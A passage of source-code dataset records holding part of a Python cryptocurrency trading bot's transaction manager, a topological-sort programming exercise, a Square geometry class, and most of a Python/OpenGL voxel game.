print(\"TRNM - Trying to buy but GDAX Controler not operational. Aborted.\")\r\n return False\r\n\r\n\r\n def TRNM_SellNow(self, isStopLossSell):\r\n if ((self.theGDAXControler.GDAX_IsConnectedAndOperational() == \"True\") or (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == False)):\r\n if (True):\r\n bOrderIsSuccessful = False\r\n\r\n # Refresh account balances =================================================================================\r\n self.FiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n self.CryptoAccountBalance = self.theGDAXControler.GDAX_GetCryptoAccountBalance()\r\n\r\n print(\"TRNM - Sell Now (fiat balance is %s, crypto balance is %s)\" % (self.FiatAccountBalance, self.CryptoAccountBalance))\r\n\r\n # Send the Sell order ======================================================================================\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n # Subtract quantum so that it compensate up roundings when retrieving balance that could be greater than actual crypto balance and cause an insufficient funds sell error\r\n ratioOfCryptoCapabilityToBuy = float(self.theSettings.SETT_GetSettings()[\"investPercentage\"]) * 0.01\r\n bOrderIsSuccessful = self.theGDAXControler.GDAX_SendSellOrder((self.CryptoAccountBalance - theConfig.CONFIG_CRYPTO_PRICE_QUANTUM) * ratioOfCryptoCapabilityToBuy)\r\n self.averageSellPriceInFiat = self.theGDAXControler.GDAX_GetRealTimePriceInEUR()\r\n else:\r\n self.averageSellPriceInFiat = self.theMarketData.MRKT_GetLastRefPrice()\r\n\r\n # Compute profit estimation ================================================================================\r\n [profitEstimationInFiat, sellPriceWithFeeInFiat] = self.computeProfitEstimation(True, self.currentBuyAmountInCryptoWithFee)\r\n\r\n # If in simulation, simulate the sell amount of money going back to the FIAT account =======================\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == False):\r\n # FIAT balance already present sell value (with GDAX fee) -> money that goes back into fiat\r\n 
self.FIATAccountBalanceSimulated = self.FIATAccountBalanceSimulated + sellPriceWithFeeInFiat\r\n self.cryptoAccountBalanceSimulated = 0\r\n self.theUIGraph.UIGR_updateAccountsBalance(round(self.FIATAccountBalanceSimulated, 5), round(self.cryptoAccountBalanceSimulated, 5))\r\n bOrderIsSuccessful = True\r\n\r\n # Update display\r\n sellTimeInTimestamp = time.time()\r\n sellTimeStr = datetime.fromtimestamp(int(sellTimeInTimestamp)).strftime('%Hh%M')\r\n\r\n if (bOrderIsSuccessful == True):\r\n self.theoricalProfit = self.theoricalProfit + profitEstimationInFiat\r\n\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n currentMidMarketPrice = self.theGDAXControler.GDAX_GetRealTimePriceInEUR()\r\n else:\r\n currentMidMarketPrice = self.theMarketData.MRKT_GetLastRefPrice()\r\n\r\n print(\"=== SELL %s at %s USD. Profit made : %s\" % (self.currentBuyAmountInCryptoWithFee, currentMidMarketPrice, profitEstimationInFiat))\r\n self.performSellDisplayActions(False, isStopLossSell, currentMidMarketPrice, profitEstimationInFiat)\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n self.buyTimeInTimeStamp = 0\r\n self.TRNM_RefreshAccountBalancesAndProfit()\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"%s: Sell order error\" % sellTimeStr, True)\r\n\r\n return bOrderIsSuccessful\r\n else:\r\n print(\"TRNM - Trying to sell but no more BTC on the account. Aborted\")\r\n return False\r\n else:\r\n print(\"TRNM - Trying to buy but GDAX Controler not operational. Aborted.\")\r\n return False\r\n\r\n def TRNM_ResetBuyData(self):\r\n self.theUIGraph.UIGR_updateInfoText(\"Last Buy has probably been sold manually\", False)\r\n self.currentBuyAmountInCryptoWithoutFee = 0\r\n self.currentBuyAmountInCryptoWithFee = 0\r\n self.currentBuyInitialPriceInEUR = 0\r\n self.currentSoldAmountInCryptoViaLimitOrder = 0\r\n self.averageSellPriceInFiat = 0\r\n\r\n def TRNM_GetCurrentBuyInitialPrice(self):\r\n\r\n self.threadOrderPlacingLock.acquire()\r\n\r\n currentBuyInitialPriceInEUR = self.currentBuyInitialPriceInEUR\r\n\r\n self.threadOrderPlacingLock.release()\r\n\r\n return self.currentBuyInitialPriceInEUR\r\n\r\n def TRNM_RefreshAccountBalancesAndProfit(self):\r\n print(\"TRNM - Refresh Account balances and profit\")\r\n\r\n # Real calculation is only applicable on real market\r\n if (theConfig.CONFIG_INPUT_MODE_IS_REAL_MARKET == True):\r\n # Sleep before fetching account balance (let time to GDAXControler to retrieve the new balances)\r\n time.sleep(0.5)\r\n self.FiatAccountBalance = self.theGDAXControler.GDAX_GetFiatAccountBalance()\r\n # Update real profit only if nothing is spent in BTC\r\n if (self.currentBuyAmountInCryptoWithoutFee < theConfig.CONFIG_CRYPTO_PRICE_QUANTUM):\r\n print(\"TRNM - Nothing spent in Crypto, profit update to %s - initial was %s\" % (self.FiatAccountBalance, self.initialFiatAccountBalance))\r\n self.realProfit = self.FiatAccountBalance - self.initialFiatAccountBalance\r\n self.percentageProfit = ((self.realProfit + self.initialInvestedFiatAmount) / (self.initialInvestedFiatAmount) - 1) * 100\r\n if (self.pendingNotificationToSend != \"\"):\r\n theNotifier.SendWhatsappMessage(self.pendingNotificationToSend + \"\\n*Total profit: %s %%*\" % round(self.percentageProfit, 1) )\r\n else:\r\n print(\"TRNM - RefreshAccountBalancesAndProfit : currentBuyAmountInCryptoWithoutFee greater than quantum: don't update 
profit. currentBuyAmountInCryptoWithoutFee is %s\" % self.currentBuyAmountInCryptoWithoutFee)\r\n\r\n self.CryptoAccountBalance = self.theGDAXControler.GDAX_GetCryptoAccountBalance()\r\n self.theUIGraph.UIGR_updateTotalProfit(round(self.realProfit, 7), round(self.theoricalProfit, 7), round(self.percentageProfit, 1), False)\r\n else:\r\n self.percentageProfit = ((self.theoricalProfit + self.initialInvestedFiatAmount) / (self.initialInvestedFiatAmount) - 1) * 100\r\n self.theUIGraph.UIGR_updateTotalProfit(0, round(self.theoricalProfit, 7), round(self.percentageProfit, 1), True)\r\n if (self.pendingNotificationToSend != \"\"):\r\n theNotifier.SendWhatsappMessage(self.pendingNotificationToSend + \"\\n*Total profit: %s %%*\" % round(self.percentageProfit, 1) )\r\n\r\n self.pendingNotificationToSend = \"\"\r\n\r\n # /!\\ TODO Check if UIGR calls are thread safe\r\n def performBuyDisplayActions(self, isLimitOrder):\r\n\r\n if (isLimitOrder):\r\n if (self.isOrderPlacingActive == False): # Order is totally filled\r\n sellTriggerInPercent = self.theSettings.SETT_GetSettings()[\"sellTrigger\"]\r\n if (sellTriggerInPercent > 0.0):\r\n sellThreshold = self.currentBuyInitialPriceInEUR * ((sellTriggerInPercent/100)+1)\r\n else:\r\n sellThreshold = self.currentBuyInitialPriceInEUR * (theConfig.CONFIG_MIN_PRICE_ELEVATION_RATIO_TO_SELL + 2*self.platformTakerFeeInPercent) # Not the official one : for display only. Trader class manages this actual feature.\r\n self.theUIGraph.UIGR_updateInfoText(\"%s %s Bought @ %s %s via limit order - Waiting for a sell opportunity above %s %s\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(sellThreshold, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]), False)\r\n theNotifier.SendWhatsappMessage(\"*BUY filled* %s %s @ %s %s via limit order - Waiting for a sell opportunity above %s %s\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(sellThreshold, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]))\r\n\r\n # Order is totally filled, add marker\r\n # self.theUIGraph.UIGR_addMarker(1)\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"%s %s Partially bought @ %s %s. Still ongoing, waiting for next matches\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]), False)\r\n theNotifier.SendWhatsappMessage(\"*BUY match* %s %s @ %s %s. Still ongoing, waiting for next matches\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]))\r\n else:\r\n buyTimeStr = datetime.fromtimestamp(int(self.buyTimeInTimeStamp)).strftime('%H:%M')\r\n sellThreshold = self.currentBuyInitialPriceInEUR * (theConfig.CONFIG_MIN_PRICE_ELEVATION_RATIO_TO_SELL + 2*self.platformTakerFeeInPercent) # Not the official one : for display only. 
Trader class manages this actual feature.\r\n self.theUIGraph.UIGR_updateInfoText(\"%s - %s %s Bought @ %s %s - Waiting for a sell opportunity above %s %s\" % (buyTimeStr, round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(sellThreshold, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"]), False)\r\n self.theGDAXControler.refreshAccounts()\r\n theNotifier.SendWhatsappMessage(\"*BUY* %s %s @ %s %s - Waiting for a sell opportunity above %s %s\" % (round(self.currentBuyAmountInCryptoWithoutFee, 5), self.theSettings.SETT_GetSettings()[\"strCryptoType\"], round(self.currentBuyInitialPriceInEUR, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(sellThreshold, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"]))\r\n # self.theUIGraph.UIGR_addMarker(1)\r\n\r\n def performSellDisplayActions(self, isLimitOrder, isStopLossSell, sellPriceInFiat, profitEstimationInFiat):\r\n sellTimeInTimestamp = time.time()\r\n sellTimeStr = datetime.fromtimestamp(int(sellTimeInTimestamp)).strftime('%Hh%M')\r\n\r\n if (isLimitOrder):\r\n if (self.isOrderPlacingActive == False): # Order is totally filled\r\n self.theUIGraph.UIGR_updateInfoText(\"SELL filled at %s, profit was about %s USD. Waiting for next buy opportunity\" % (sellTimeStr, round(profitEstimationInFiat, 5)), False)\r\n self.pendingNotificationToSend = (\"*SELL filled* at %s %s, profit was about *%s USD*. \" % (round(sellPriceInFiat, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(profitEstimationInFiat, 5)))\r\n # Order is totally filled, add marker\r\n # self.theUIGraph.UIGR_addMarker(2)\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"Partial sell at %s, profit was about %s USD. Still ongoing, waiting for next matches\" % (sellTimeStr, round(profitEstimationInFiat, 5)), False)\r\n self.pendingNotificationToSend = (\"*SELL match* at %s %s, profit was about *%s USD*. \" % (round(sellPriceInFiat, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(profitEstimationInFiat, 5)))\r\n else:\r\n if (isStopLossSell == False):\r\n self.theUIGraph.UIGR_updateInfoText(\"Last sell at %s, profit was about %s USD. Waiting for next buy opportunity\" % (sellTimeStr, round(profitEstimationInFiat, 5)), False)\r\n self.pendingNotificationToSend = (\"*SELL* at %s %s, profit was about *%s USD*. \" % (round(sellPriceInFiat, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(profitEstimationInFiat, 5)))\r\n else:\r\n self.theUIGraph.UIGR_updateInfoText(\"StopLoss-sell at %s, loss was about %s USD. Waiting for next buy opportunity\" % (sellTimeStr, round(profitEstimationInFiat, 5)), True)\r\n self.pendingNotificationToSend = (\"*STOPLOSS-SELL* at %s %s, loss was about *%s USD*. 
\" % (round(sellPriceInFiat, 5), self.theSettings.SETT_GetSettings()[\"strFiatType\"], round(profitEstimationInFiat, 5)))\r\n # Add marker\r\n # self.theUIGraph.UIGR_addMarker(2)","repo_name":"MufengW/ECE496","sub_path":"Astibot/TransactionManager.py","file_name":"TransactionManager.py","file_ext":"py","file_size_in_byte":26072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23506463089","text":"import sys\ninput = sys.stdin.readline\n\nfrom collections import deque\n\nT = int(input())\n\n\nfor _ in range(T):\n N, K = map(int, input().split())\n\n time = list(map(int, input().split()))\n time.insert(0, 0)\n\n dp = [0] * (N+1)\n\n connection = [[] for _ in range(N+1)]\n #먼저 건설해야하는 빌딩 수 저장\n seq = [0] * (N+1)\n\n for _ in range(K):\n x, y = map(int, input().split())\n #x를 지으면 y를 지을 수 있음\n connection[x].append(y)\n #y를 지으려면 seq[y]개의 건물을 지어야함\n seq[y] += 1\n\n dq = deque()\n\n #지금 지을 수 있는 건물\n for i in range(1, N+1):\n if seq[i] == 0:\n dq.append(i)\n\n while dq:\n x = dq.popleft()\n #x를 지으면 지을 수 있는 건물\n for y in connection[x]:\n #x를 지었으므로 지어야 하는 건물 -1\n seq[y] -= 1\n # 건물 시간 최대로\n dp[y] = max(dp[x] + time[x], dp[y])\n if seq[y] == 0:\n dq.append(y)\n \n\n W = int(input())\n print(dp[W] + time[W])\n","repo_name":"nkrang/Algorithm-Study","sub_path":"202111/B-1005/ACM_craft.py","file_name":"ACM_craft.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22365257570","text":"#!/usr/bin/python3\n\"\"\" This module defines the Square class \"\"\"\nfrom .rectangle import Rectangle\n\n\nclass Square(Rectangle):\n \"\"\" Represents the square shape \"\"\"\n def __init__(self, size, x=0, y=0, id=None):\n \"\"\"\n Initialize an instance of a square\n\n Parameters\n size : integer\n The size (width and height) for the square\n x : integer, optional\n The x axis for displaying the square\n y : integer, optional\n The y axis for displaying the square\n \"\"\"\n super().__init__(id=id, x=x, y=y, width=size, height=size)\n\n def __str__(self):\n \"\"\"\n Returns the string representation of the square.\n \"\"\"\n return (\"[Square] ({}) {}/{} - {}\".format(self.id, self.x,\n self.y, self.width, self.height))\n\n @property\n def size(self):\n \"\"\" Return the size for the square \"\"\"\n return (self.width)\n\n @size.setter\n def size(self, value):\n \"\"\"\n Set the size for the square\n\n Parameters\n value : integer\n The size for the square\n \"\"\"\n self.width = value\n self.height = value\n\n def update(self, *args, **kwargs):\n \"\"\"\n Update the square attributes\n\n Parameters\n args : tuple\n Values for square attributes as positional\n arguments.\n kwargs : dictionary\n Values for square attributes as named\n arguments.\n \"\"\"\n if (len(args) > 0 and type(args[0]) is int):\n if (len(args) == 1):\n self.id, = args\n elif (len(args) == 2):\n self.id, self.size = args\n elif (len(args) == 3):\n self.id, self.size, self.x = args\n else:\n self.id, self.size, self.x, self.y = args\n else:\n self.id = kwargs.get(\"id\") if kwargs.get(\"id\") is not None \\\n else self.id\n self.size = kwargs.get(\"size\") if kwargs.get(\"size\") is \\\n not None else self.size\n self.x = kwargs.get(\"x\") if kwargs.get(\"x\") is not None \\\n else self.x\n self.y = kwargs.get(\"y\") if kwargs.get(\"y\") is not None \\\n else self.y\n\n def to_dictionary(self):\n \"\"\"\n Returns dictionary representation for instance\n of a square.\n \"\"\"\n return {\n 
\"x\": self.x,\n \"y\": self.y,\n \"id\": self.id,\n \"size\": self.width\n }\n","repo_name":"MartyOfMCA/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4806433128","text":"from __future__ import annotations\nimport glfw\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nimport math\nfrom utils import HitResult, bresenham, VertexDrawer, JSONWithCommentsDecoder\nfrom textures import TextureManager\nfrom tiles import BLOCK_TYPES\nfrom window import GameWindow\nimport os\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\nfrom player import Player\nfrom menus import *\nfrom constants import *\nfrom font import Font\nfrom world import World\n\nclass GameSettings:\n def __init__(self):\n self.fog_distance = 1\n self.show_block_preview = True\n self.sound_enabled = True\n self.vsync = True\n self.language = \"en_us\"\n\n def load(self):\n try:\n with open(\"settings.txt\", \"r\") as f:\n for line in f.readlines():\n ln = line.strip()\n option_ln = ln.split(\":\")\n\n if len(option_ln) < 2:\n continue\n\n if option_ln[0] == \"fog_distance\" and option_ln[1].isnumeric():\n self.fog_distance = int(option_ln[1])\n\n if option_ln[0] == \"show_block_preview\":\n self.show_block_preview = option_ln[1] == \"True\"\n\n if option_ln[0] == \"vsync\":\n self.vsync = option_ln[1] == \"True\"\n \n if option_ln[0] == \"sound\":\n self.sound_enabled = option_ln[1] == \"True\"\n \n if option_ln[0] == \"language\":\n self.language = option_ln[1] if [\"en_us\", \"pt_pt\"].count(option_ln[1]) > 0 else \"en_us\"\n except Exception:\n pass\n \n def save(self):\n with open(\"settings.txt\", \"w\") as f:\n f.write(f\"vsync:{self.vsync}\\n\")\n f.write(f\"fog_distance:{self.fog_distance}\\n\")\n f.write(f\"show_block_preview:{self.show_block_preview}\\n\")\n f.write(f\"sound:{self.sound_enabled}\\n\")\n f.write(f\"language:{self.language}\")\n\nclass Game:\n def __init__(self):\n self.show_debug = False\n self.window = GameWindow(self, 700, 450)\n self.settings = GameSettings()\n self.texture_manager = TextureManager()\n self.current_fps = 0\n self.mouse = {\n 'x': 0,\n 'y': 0,\n 'dx': 0,\n 'dy': 0\n }\n self.running = True\n self.player: Player | None = None \n self.__menu: Menu | None = None\n self.window.mouse_button_func(self.on_mouse_button)\n self.window.scroll_func(self.on_scroll)\n self.window.size_changed_func(self.on_framebuffer_size_changed)\n self.window.cursor_pos_func(self.on_cursor_pos)\n self.window.key_func(self.on_key)\n self.world: World | None = None\n self.hit_result: HitResult | None = None\n self.font = Font(self)\n self.selected_tile = 1\n self.chunk_updates = 0\n self.workaround_hit_face = 0\n self.click_sound = pygame.mixer.Sound(\"res/sounds/click.mp3\")\n self.block_sound = pygame.mixer.Sound(\"res/sounds/block.mp3\")\n self.block_sound.set_volume(0.7)\n self.translations = {}\n\n @property\n def menu(self):\n return self.__menu\n \n @menu.setter\n def menu(self, menu):\n if self.__menu != None:\n self.__menu.on_remove()\n\n self.__menu = menu\n\n if self.__menu != None:\n self.__menu.on_display()\n\n def load_translations(self):\n with open(f\"res/languages/{self.settings.language}.json\", \"r\", encoding=\"utf-8\") as f:\n self.translations = json.load(f)\n\n def translate_key(self, key: str, *args: object):\n translation: str = key if 
self.translations.get(key) == None else self.translations.get(key) \n try:\n return translation.format(*args)\n except Exception:\n return translation\n\n def play_sound(self, sound: pygame.mixer.Sound):\n if self.settings.sound_enabled:\n pygame.mixer.Sound.play(sound)\n\n def start_world(self):\n self.menu = LoadingTerrainMenu(self)\n\n def load_world(self):\n self.world = World(self)\n self.grab_mouse()\n self.menu = None\n\n def shutdown(self):\n self.running = False\n\n def on_scroll(self, x_offset, y_offset):\n step = 1 if y_offset > 0 else -1\n\n self.selected_tile -= step\n\n if self.selected_tile < 1:\n self.selected_tile = 9\n\n if self.selected_tile > 9:\n self.selected_tile = 1\n\n def on_framebuffer_size_changed(self):\n glViewport(0, 0, self.window.width, self.window.height)\n if self.menu != None:\n self.menu.resize()\n\n def on_mouse_button(self, button: int, action: int):\n if action == glfw.PRESS and button == 0 and self.menu != None:\n self.menu.mouse_clicked((self.mouse['x'] / self.window.scale_factor, self.mouse['y'] / self.window.scale_factor))\n\n if action == glfw.PRESS and button == 0 and self.menu == None and self.hit_result != None:\n self.world.set_tile(self.hit_result.bx, self.hit_result.by, self.hit_result.bz, 0)\n self.play_sound(self.block_sound)\n \n if action == glfw.PRESS and button == 1 and self.menu == None and self.hit_result != None:\n self.world.set_tile(self.hit_result.bx, self.hit_result.by + 1, self.hit_result.bz, self.selected_tile)\n self.play_sound(self.block_sound)\n \n def on_cursor_pos(self, xpos, ypos):\n self.mouse['dx'] = xpos - self.mouse['x']\n self.mouse['dy'] = self.mouse['y'] - ypos\n self.mouse['x'] = xpos\n self.mouse['y'] = ypos\n\n def on_key(self, key, scancode, action):\n if action == glfw.PRESS and self.menu != None:\n self.menu.key_pressed(key)\n\n if action == glfw.PRESS and key == glfw.KEY_ESCAPE and self.menu == None:\n self.menu = PauseMenu(self)\n self.ungrab_mouse()\n\n if action == glfw.PRESS and key == glfw.KEY_F7:\n self.texture_manager.reload_textures()\n\n if action == glfw.PRESS and key == glfw.KEY_F and self.menu == None:\n self.settings.fog_distance += 1\n if self.settings.fog_distance > 3:\n self.settings.fog_distance = 1\n\n if action == glfw.PRESS and key == glfw.KEY_F3:\n self.show_debug = not self.show_debug\n\n if action == glfw.PRESS and self.menu == None and key == glfw.KEY_N:\n self.workaround_hit_face += 1\n if self.workaround_hit_face > 5:\n self.workaround_hit_face = 0\n\n if action == glfw.PRESS and (key >= glfw.KEY_1 and key <= glfw.KEY_9):\n self.selected_tile = key - glfw.KEY_0\n\n def grab_mouse(self):\n glfw.set_cursor_pos(self.window.handle, self.window.width / 2, self.window.height / 2)\n glfw.set_input_mode(self.window.handle, glfw.CURSOR, glfw.CURSOR_DISABLED)\n\n def ungrab_mouse(self):\n glfw.set_input_mode(self.window.handle, glfw.CURSOR, glfw.CURSOR_NORMAL)\n glfw.set_cursor_pos(self.window.handle, self.window.width / 2, self.window.height / 2)\n\n def get_camera_pos(self):\n return [self.player.x, self.player.y, self.player.z]\n\n def run(self):\n self.settings.load()\n self.load_translations()\n self.window.init(\"Voxels\")\n self.texture_manager.load('grass.png')\n self.texture_manager.load('gui.png')\n self.texture_manager.load('bg.png')\n self.texture_manager.load('prof.png')\n self.texture_manager.load('not_bedrock.png')\n self.menu = MainMenu(self)\n\n glClearColor(0.239, 0.686, 0.807, 1.0)\n last_time = glfw.get_time()\n frame_counter = 0\n tick_last_time = glfw.get_time()\n 
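# Fixed-timestep bookkeeping: elapsed wall-clock time is converted into whole 60 Hz ticks below, and the fractional remainder carries over in tick_delta between frames.\n        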
tick_delta = 0\n\n while self.running:\n if self.window.should_close():\n self.running = False\n\n tick_now = glfw.get_time()\n tick_passed_sec = tick_now - tick_last_time\n tick_last_time = tick_now\n tick_delta += tick_passed_sec * 60 / 1.0\n ticks = int(tick_delta)\n tick_delta -= ticks\n\n for _ in range(0, ticks):\n self.tick()\n\n dx = self.mouse['dx']\n dy = self.mouse['dy']\n if self.menu == None and self.world != None:\n self.player.turn(dx, dy)\n self.mouse['dx'] = 0\n self.mouse['dy'] = 0\n \n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n self.render(tick_delta)\n \n self.window.update_frame()\n\n frame_counter += 1\n\n now = glfw.get_time()\n if now - last_time > 1.0:\n last_time = now\n self.current_fps = frame_counter\n frame_counter = 0\n\n self.settings.save()\n if self.world != None:\n self.world.dispose()\n self.texture_manager.dispose()\n glfw.terminate()\n\n def render(self, tick_delta: float):\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(70, self.window.width / self.window.height, 0.05, 1000.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n glEnable(GL_TEXTURE_2D)\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_CULL_FACE)\n \n if self.world != None:\n glTranslatef(0, 0, -0.3)\n glRotatef(self.player.rot_x, 1.0, 0.0, 0.0);\n glRotatef(self.player.rot_y, 0.0, 1.0, 0.0);\n\n player_x = self.player.old_x + (self.player.x - self.player.old_x) * tick_delta\n player_y = self.player.old_y + (self.player.y - self.player.old_y) * tick_delta\n player_z = self.player.old_z + (self.player.z - self.player.old_z) * tick_delta\n\n glTranslatef(-player_x, -player_y, -player_z)\n\n # idek\n start_pos = self.get_camera_pos()\n end_pos = self.get_camera_pos()\n rv0 = math.cos(-self.player.rot_y * (math.pi / 180.0) - math.pi)\n rv1 = math.sin(-self.player.rot_y * (math.pi / 180.0) - math.pi)\n rv2 = -math.cos(-self.player.rot_x * math.pi / 180.0)\n rv3 =-math.sin(-self.player.rot_x * math.pi / 180.0)\n\n end_pos[0] -= rv1 * rv2 * 7\n end_pos[1] -= rv3 * 7\n end_pos[2] -= rv0 * rv2 * 7\n #\n\n self.hit_result = bresenham(self.world, start_pos, end_pos, lambda tile_id : BLOCK_TYPES[tile_id])\n\n self.texture_manager.get(\"grass.png\").bind()\n self.world.render()\n\n if self.hit_result != None:\n glDisable(GL_TEXTURE_2D)\n \n selx0 = self.hit_result.bx - 0.005\n sely0 = self.hit_result.by - 0.005\n selz0 = self.hit_result.bz - 0.005\n selx1 = self.hit_result.bx + 1.005\n sely1 = self.hit_result.by + 1.005\n selz1 = self.hit_result.bz + 1.005\n \n glColor4f(0.0, 0.0, 0.0, 1.0)\n glBegin(GL_LINES)\n # ver\n glVertex3f(selx0, sely0, selz0)\n glVertex3f(selx0, sely1, selz0)\n glVertex3f(selx1, sely0, selz0)\n glVertex3f(selx1, sely1, selz0)\n glVertex3f(selx1, sely0, selz1)\n glVertex3f(selx1, sely1, selz1)\n glVertex3f(selx0, sely0, selz1)\n glVertex3f(selx0, sely1, selz1)\n # hor\n glVertex3f(selx0, sely0, selz0)\n glVertex3f(selx1, sely0, selz0)\n\n glVertex3f(selx0, sely0, selz1)\n glVertex3f(selx1, sely0, selz1)\n\n glVertex3f(selx0, sely0, selz0)\n glVertex3f(selx0, sely0, selz1)\n\n glVertex3f(selx1, sely0, selz0)\n glVertex3f(selx1, sely0, selz1)\n\n glVertex3f(selx0, sely1, selz0)\n glVertex3f(selx1, sely1, selz0)\n\n glVertex3f(selx0, sely1, selz1)\n glVertex3f(selx1, sely1, selz1)\n\n glVertex3f(selx0, sely1, selz0)\n glVertex3f(selx0, sely1, selz1)\n\n glVertex3f(selx1, sely1, selz0)\n glVertex3f(selx1, sely1, selz1)\n glEnd()\n glEnable(GL_TEXTURE_2D)\n\n glClear(GL_DEPTH_BUFFER_BIT)\n\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(0, 
self.window.scaled_width(), self.window.scaled_height(), 0, 1000.0, 3000.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n glTranslatef(0.0, 0.0, -2000.0)\n\n glDisable(GL_DEPTH_TEST)\n glDisable(GL_CULL_FACE)\n\n glEnable(GL_BLEND)\n glBlendFunc(GL_ONE_MINUS_DST_COLOR, GL_ONE_MINUS_SRC_COLOR)\n self.draw_texture(\"gui.png\", self.window.scaled_width() / 2 - 8, self.window.scaled_height() / 2 - 8, 16, 16, 240, 0, 16, 16, 256, 256)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n self.draw_texture(\"gui.png\", self.window.scaled_width() / 2 - 91, self.window.scaled_height() - 22, 182, 22, 0, 0, 182, 22, 256, 256)\n \n self.texture_manager.get(\"grass.png\").bind()\n \n if self.settings.show_block_preview:\n glEnable(GL_CULL_FACE)\n glPushMatrix()\n glTranslatef(self.window.scaled_width() - 45, 80, 20)\n glRotatef(-20, 1, 0, 0)\n glRotatef(44, 0, 1, 0)\n glTranslatef(0, -10, 0)\n glScalef(26, -26, 26)\n\n tile_type = BLOCK_TYPES[self.selected_tile]\n vertex_drawer = VertexDrawer()\n vertex_drawer.begin(GL_QUADS)\n tile_type.render_in_gui(vertex_drawer=vertex_drawer)\n vertex_drawer.flush()\n glPopMatrix()\n glDisable(GL_CULL_FACE)\n\n for i in range(0, 9):\n tile_txr = BLOCK_TYPES[i + 1].north_txr\n self.draw_texture(\"grass.png\", self.window.scaled_width() / 2 - 91 + 3 + i * 20, self.window.scaled_height() - 22 + 3, 16, 16, (tile_txr % 16) * 16, (tile_txr // 16) * 16, 16, 16, 256, 256)\n\n self.draw_texture(\"gui.png\", self.window.scaled_width() / 2 - 91 + (self.selected_tile - 1) * 20, self.window.scaled_height() - 22 - 1, 24, 24, 40, 22, 24, 24, 256, 256)\n\n glDisable(GL_BLEND)\n\n if self.world != None:\n self.font.draw_text(GAME_VERSION, 1, 1, 0xFFFFFF, 0)\n\n if self.show_debug:\n self.font.draw_text(f\"{self.current_fps} FPS\", 1, 11, 0xFFFFFF, 0)\n self.font.draw_text(f\"{'X: {:.4f}'.format(self.player.x)}\", 1, 21, 0xFFFFFF, 0)\n self.font.draw_text(f\"{'Y: {:.4f}'.format(self.player.y)}\", 1, 31, 0xFFFFFF, 0)\n self.font.draw_text(f\"{'Z: {:.4f}'.format(self.player.z)}\", 1, 41, 0xFFFFFF, 0)\n self.font.draw_text(f\"Selected Tile: {self.selected_tile}\", 1, 51, 0xFFFFFF, 0)\n self.font.draw_text(\"Press F3 to show/hide debug\", 1, 71, 0xFFFFFF, 0)\n self.font.draw_text(\"Press 1-9 to select blocks\", 1, 81, 0xFFFFFF, 0)\n self.font.draw_text(\"Press F7 to reload textures\", 1, 91, 0xFFFFFF, 0)\n self.font.draw_text(f\"Python {platform.sys.version_info.major}.{platform.sys.version_info.minor}.{platform.sys.version_info.micro}\", self.window.scaled_width() - 1, 1, 0xFFFFFF, 1)\n self.font.draw_text(f\"Display: {self.window.width}x{self.window.height}\", self.window.scaled_width() - 1, 21, 0xFFFFFF, 1)\n else:\n self.font.draw_text(\"Press F3 to show debug\", 1, 11, 0xFFFFFF, 0)\n self.font.draw_text(\"Press 1-9 to select blocks\", 1, 21, 0xFFFFFF, 0)\n\n if self.menu != None:\n self.menu.render(self, (self.mouse['x'] / self.window.scale_factor, self.mouse['y'] / self.window.scale_factor))\n\n def 